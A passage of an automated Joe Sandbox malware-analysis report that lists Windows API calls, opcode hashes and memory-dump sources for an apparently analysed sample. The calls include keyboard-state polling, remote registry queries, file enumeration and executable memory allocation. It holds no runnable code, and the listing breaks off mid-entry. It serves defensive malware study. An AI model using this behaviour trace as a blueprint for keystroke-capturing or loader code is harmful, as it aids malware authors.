                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1473721057-0
                                                                                                    • Opcode ID: 0c81dc36f765ef27acd3fa525127fedc690c559d9010926208fa0ffab8212e03
                                                                                                    • Instruction ID: b438080bcc99deee6ba9d29920becd7b3e0015bb17bad3960fb703010f5bf17a
                                                                                                    • Opcode Fuzzy Hash: 0c81dc36f765ef27acd3fa525127fedc690c559d9010926208fa0ffab8212e03
                                                                                                    • Instruction Fuzzy Hash: C3F0E572B046006ADB206AB49805FB2B7E8AB20315F14881ED4C582181C7B2D4949B52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 001A512C
                                                                                                      • Part of subcall function 001A2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4), ref: 001A2D6E
                                                                                                      • Part of subcall function 001A2D58: GetLastError.KERNEL32(00241DC4,?,001ADB71,00241DC4,00000000,00241DC4,00000000,?,001ADB98,00241DC4,00000007,00241DC4,?,001ADF95,00241DC4,00241DC4), ref: 001A2D80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353095263-0
                                                                                                    • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                    • Instruction ID: 10852f78544ca26f4f4ce8853cdd8ede1a89e29111468ea3064d140846ad45d0
                                                                                                    • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                    • Instruction Fuzzy Hash: 5CE0927A2007059F8720CF6CD800A92BBF5EF963207208529E89ED7221D371E812CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                    • Instruction ID: d9899a047a849275aa2493cdc6a550d75f0a0f718ae59871cf45780c46d5e269
                                                                                                    • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                    • Instruction Fuzzy Hash: 8FF0F87140420DFFDF05DF90C941E9E7BB9FB14318F208545F9199A151D336DA21EBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 176396367-0
                                                                                                    • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                    • Instruction ID: 793c3b134072d77b6b21f978fdd1bd2a4c8e20d7f1b0507c42e97bd72cff67cf
                                                                                                    • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                    • Instruction Fuzzy Hash: 02D0A7333420103ABA69313D2D0BC7F455CCFE26A0B04007FFA02CA1A5EE444C0301E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 001DE7A2
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NamePathShort_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2021730007-0
                                                                                                    • Opcode ID: 822d58fd26f4815cebb7cd031c65987792cdb79af42ed541fc91dc4f4ff46414
                                                                                                    • Instruction ID: d2e0ab58c764ff07d4e3c2173f341bda4d875482975948759f17971b600a685e
                                                                                                    • Opcode Fuzzy Hash: 822d58fd26f4815cebb7cd031c65987792cdb79af42ed541fc91dc4f4ff46414
                                                                                                    • Instruction Fuzzy Hash: 41E0CD765402245BC710A2989C09FDA77EDEFC8790F0440B0FC09D7249DEA4DD808590
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,0017B0DE,?,?,00000000,?,00176B73,?), ref: 0018F156
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 49897953a921158fee55a73ef869a36e897759896ef727a080c30e153477b328
                                                                                                    • Instruction ID: d5a010a12e405f500ae33840f0b6caacbe0ffa5b5326bf968652f16a9abf8ee5
                                                                                                    • Opcode Fuzzy Hash: 49897953a921158fee55a73ef869a36e897759896ef727a080c30e153477b328
                                                                                                    • Instruction Fuzzy Hash: 2AE092B5510704AFD728DF55D84AD97BBF8EB08310B00455EA85693740E7B1BD448B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001739FD
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 541455249-0
                                                                                                    • Opcode ID: d2237e0d644df1c5d1649bdf53871f5b10a3bdf9fd58f85dcb204b6f6fe923cd
                                                                                                    • Instruction ID: 9f5824bb0a8d6d7dfc231b4747f8c47bb38916fd1900f37278c1173622a93737
                                                                                                    • Opcode Fuzzy Hash: d2237e0d644df1c5d1649bdf53871f5b10a3bdf9fd58f85dcb204b6f6fe923cd
                                                                                                    • Instruction Fuzzy Hash: 78E0CD725002245BC710A2989C09FDA77EDDFC8790F0441B1FC09D7249DEB4DD808590
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001DE76C
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderPath_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2987691875-0
                                                                                                    • Opcode ID: f2986be18967922a22e9eb29b9ba4db21f7ba09af9be8dbf815cbf0437dcc1d8
                                                                                                    • Instruction ID: c29898671d71c61d8604db28a498b44ab71bd3d023346432d9103fe1f3b77470
                                                                                                    • Opcode Fuzzy Hash: f2986be18967922a22e9eb29b9ba4db21f7ba09af9be8dbf815cbf0437dcc1d8
                                                                                                    • Instruction Fuzzy Hash: 1FD05EA19003282BDF60A6B49C0DDB73AACD740210F004AA0786DD3142EA74ED4486B0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000,001B3A1C), ref: 00177973
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    • Opcode ID: ed8c8bb0d480f36ce9ede271e68d43f39c33596b52d23e50cee7e827911679aa
                                                                                                    • Instruction ID: 53bfe719021e12418e9eac7ed4b66aa3536b58348cd4be6b109412e3a559d07f
                                                                                                    • Opcode Fuzzy Hash: ed8c8bb0d480f36ce9ede271e68d43f39c33596b52d23e50cee7e827911679aa
                                                                                                    • Instruction Fuzzy Hash: 92E09275405B12CFC3314F1AE804412FBF4FED23757218A2ED1E9826A0D3B05896CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,001B0AA4,?,?,00000000,?,001B0AA4,00000000,0000000C), ref: 001B0757
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 70b35d97930651fd4f1cbf36a8d150b0e2f3ee660ac994e6d5aee209eca7a915
                                                                                                    • Instruction ID: 5109ff895e6af6363f831bcae22ed507dd119fe4b50a7437aabaa335f926c8e0
                                                                                                    • Opcode Fuzzy Hash: 70b35d97930651fd4f1cbf36a8d150b0e2f3ee660ac994e6d5aee209eca7a915
                                                                                                    • Instruction Fuzzy Hash: ADD06C3200020DBBDF028F84ED06EDA3BAAFB48714F014000BE1856020C732E821AB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,001DD755), ref: 001DE9C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 72967a3d8d88521b8e032d8d7698b507c00277c8893895e776e94fabbf7985d7
                                                                                                    • Instruction ID: b3cbc7f3abf30b2223e6eb71efa5981aee25b0cd66038050dd896e088dbd1429
                                                                                                    • Opcode Fuzzy Hash: 72967a3d8d88521b8e032d8d7698b507c00277c8893895e776e94fabbf7985d7
                                                                                                    • Instruction Fuzzy Hash: A2B0922400261009BD7C2A3C2A2C1A9278068433AB7DC1B96E8B9992E3C33A880BE610
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,010DE603,0000003C,0000001E,0000004A,0000003E,00000042), ref: 010DE9BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010D9000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction ID: ec27869c955d1737f073870aebe05b0b2b35fae0e4b44743f570745af984d6a6
                                                                                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction Fuzzy Hash: 5ED012B018530276F691BBB1CC02F99BA91AF50B42F402C58B3DC3C1E1C5BA95595A96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,010DE603,0000003C,0000001E,0000004A,0000003E,00000042), ref: 010DE9BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DB000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction ID: ec27869c955d1737f073870aebe05b0b2b35fae0e4b44743f570745af984d6a6
                                                                                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                                                                                    • Instruction Fuzzy Hash: 5ED012B018530276F691BBB1CC02F99BA91AF50B42F402C58B3DC3C1E1C5BA95595A96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,010DE603,0000003C,0000001E,0000004A,0000003E,00000042), ref: 010DE9BF
Memory Dump Source
• Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
• Instruction ID: ec27869c955d1737f073870aebe05b0b2b35fae0e4b44743f570745af984d6a6
• Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
• Instruction Fuzzy Hash: 5ED012B018530276F691BBB1CC02F99BA91AF50B42F402C58B3DC3C1E1C5BA95595A96
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 001EA11B
• FindNextFileW.KERNEL32(00000000,?), ref: 001EA176
• FindClose.KERNEL32(00000000), ref: 001EA181
• FindFirstFileW.KERNEL32(*.*,?), ref: 001EA19D
• SetCurrentDirectoryW.KERNEL32(?), ref: 001EA1ED
• SetCurrentDirectoryW.KERNEL32(00237B94), ref: 001EA20B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 001EA215
• FindClose.KERNEL32(00000000), ref: 001EA222
• FindClose.KERNEL32(00000000), ref: 001EA232
  • Part of subcall function 001DE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001DE2C9
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 6a8008dc1974f8007e17112df43497198c131422f2f83d6d30c5e7c3655eaa92
• Instruction ID: fc9759114c1cf5c1002f133b4c84902e66ff3aa4a48fe821637df25b0dd43c26
• Opcode Fuzzy Hash: 6a8008dc1974f8007e17112df43497198c131422f2f83d6d30c5e7c3655eaa92
• Instruction Fuzzy Hash: 94310472501B5A6FDF20AFB5EC48ADE77AD9F06324F500191E910F3092DB71EA85CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 001FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FC00D,?,?), ref: 001FD314
  • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD350
  • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3C7
  • Part of subcall function 001FD2F7: _wcslen.LIBCMT ref: 001FD3FD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001FC89D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001FC908
• RegCloseKey.ADVAPI32(00000000), ref: 001FC92C
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001FC98B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001FCA46
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001FCAB3
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001FCB48
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 001FCB99
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 001FCC42
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 001FCCE1
• RegCloseKey.ADVAPI32(00000000), ref: 001FCCEE
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
• Opcode ID: 8e970f838980d30a14ea00aa5121b8a0ba2f062b4454c139d2e7ac29533bc7ee
• Instruction ID: 2c85a17434a2b65d5a0847fb714fad27a8a2aa1b99294e1727c523bc6be6263b
• Opcode Fuzzy Hash: 8e970f838980d30a14ea00aa5121b8a0ba2f062b4454c139d2e7ac29533bc7ee
• Instruction Fuzzy Hash: 99024D716042089FD714DF24C995E3ABBE5EF48318F18849DF94ACB2A2DB31ED42DB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?), ref: 001DA572
• GetAsyncKeyState.USER32(000000A0), ref: 001DA5F3
• GetKeyState.USER32(000000A0), ref: 001DA60E
• GetAsyncKeyState.USER32(000000A1), ref: 001DA628
• GetKeyState.USER32(000000A1), ref: 001DA63D
• GetAsyncKeyState.USER32(00000011), ref: 001DA655
• GetKeyState.USER32(00000011), ref: 001DA667
• GetAsyncKeyState.USER32(00000012), ref: 001DA67F
• GetKeyState.USER32(00000012), ref: 001DA691
• GetAsyncKeyState.USER32(0000005B), ref: 001DA6A9
• GetKeyState.USER32(0000005B), ref: 001DA6BB
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: e38b933cefd163b4e1d58fa7c7b4a8298ca647faa90865e0e4e7540c8f2604f7
• Instruction ID: 24ff09209a8469bf6bf08df5b1f3329c4ed27b72a2be2c6cf42dcb56984cab5a
• Opcode Fuzzy Hash: e38b933cefd163b4e1d58fa7c7b4a8298ca647faa90865e0e4e7540c8f2604f7
• Instruction Fuzzy Hash: AC41B7745047C9AEFF31CB6498143A5BEA0AF11344F88805BD9C64A7C2EB95DDD8CBA3
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32 ref: 001F40D1
• CoUninitialize.OLE32 ref: 001F40DC
• CoCreateInstance.OLE32(?,00000000,00000017,00210B44,?), ref: 001F4136
• IIDFromString.OLE32(?,?), ref: 001F41A9
• VariantInit.OLEAUT32(?), ref: 001F4241
• VariantClear.OLEAUT32(?), ref: 001F4293
Strings
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
